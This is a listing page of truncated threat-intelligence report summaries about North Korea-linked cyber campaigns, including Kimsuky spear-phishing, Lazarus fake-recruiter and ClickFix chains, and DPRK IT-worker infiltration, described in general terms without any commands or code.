778 reports
Moonlock describes a fake-interview campaign that lures job seekers into running commands from malicious recruiting sites, with a focus on cryptocurrency theft. The macOS chain downloads ffmpeg.sh, selects an ARM or Intel VCam archive from attacker infras…
The source reports a hacking email campaign that impersonated a Seoul city official and was suspected to be the work of North Korea-linked Kimsuky. Although the archived body is sparse, the report provides incident-level evidence of government-themed soci…
ESRC reported a spear-phishing campaign in which attackers impersonated business counterparts by abusing reply-chain context and spoofed sender names to make malicious emails appear trustworthy. The emails carried EGG archives containing PIF executables, …
Securonix observed the DEEP#DRIVE campaign attributed to Kimsuky targeting South Korean businesses, government entities, and cryptocurrency users with Korean-language phishing lures disguised as work logs, insurance documents, and crypto-related files. Th…
SecurityScorecard’s STRIKE team attributes Operation Marstech Mayhem to Lazarus Group and describes Marstech1 as an implant aimed at software developers and cryptocurrency wallets through manipulated open-source repositories. Attackers used fake GitHub re…
A sample shared as possible Lazarus malware was assessed as a North Korean backdoor likely representing a newer version of PEBBLEDASH. The campaign used a 64-bit dropper with a PDF icon and a decoy Oracle scheduled maintenance report tied to South Korean …
Recorded Future describes North Korean IT-worker operations that use false identities and remote employment to generate regime revenue while creating insider risk for international companies. Insikt Group links the broader threat to PurpleBravo activity o…
Secureworks CTU describes DPRK nationals posing as legitimate IT professionals to obtain employment inside unwitting organizations. The webinar frames the activity as an infiltration scheme with distinct applicant behavior, tooling, and warning signs that…
The second Nurilab analysis continues the Lazarus ClickFix malware chain and focuses on the final C# binary, Tvooly.exe, produced after seven stages of de-obfuscation, decryption, and C2 communication. Tvooly.exe uses obfuscation, AES-based resource decry…
The Malware Analysis Space post examines a Kimsuky/APT43 PowerShell sample associated with ASEC reporting on forceCopy malware used in spear phishing. The sample, identified by MD5 1e9d94d88fdac3c4a0a47a3a1d07e329, uses heavy obfuscation with reversed str…
CYFIRMA profiles APT43 as a North Korean state-sponsored operator linked to the Reconnaissance General Bureau and associated with aliases including Kimsuky, Emerald Sleet, TA427, Thallium, and Velvet Chollima. The profile emphasizes strategic intelligence…
Google Threat Intelligence Group framed cybercrime as a national security threat because criminal services, malware, and monetization channels support both financially motivated and state-linked activity. The report notes North Korean targeting of cryptoc…
Lazarus operators used LinkedIn recruiter personas to approach finance and travel-sector targets with a supposed decentralized exchange project. After collecting a CV or GitHub link, the attackers shared a GitHub or Bitbucket repository containing obfusca…
Microsoft Threat Intelligence has observed North Korean state actor Emerald Sleet (also known as Kimsuky and VELVET CHOLLIMA) using a new tactic: tricking targets into running PowerShell as an administrator and then pasting and running code provided by th…
South Korean authorities were reportedly investigating a breach of a developer for On-Nara, the government-wide electronic document management system used for drafting, reviewing, approving, and sharing official documents. The article says the intrusion w…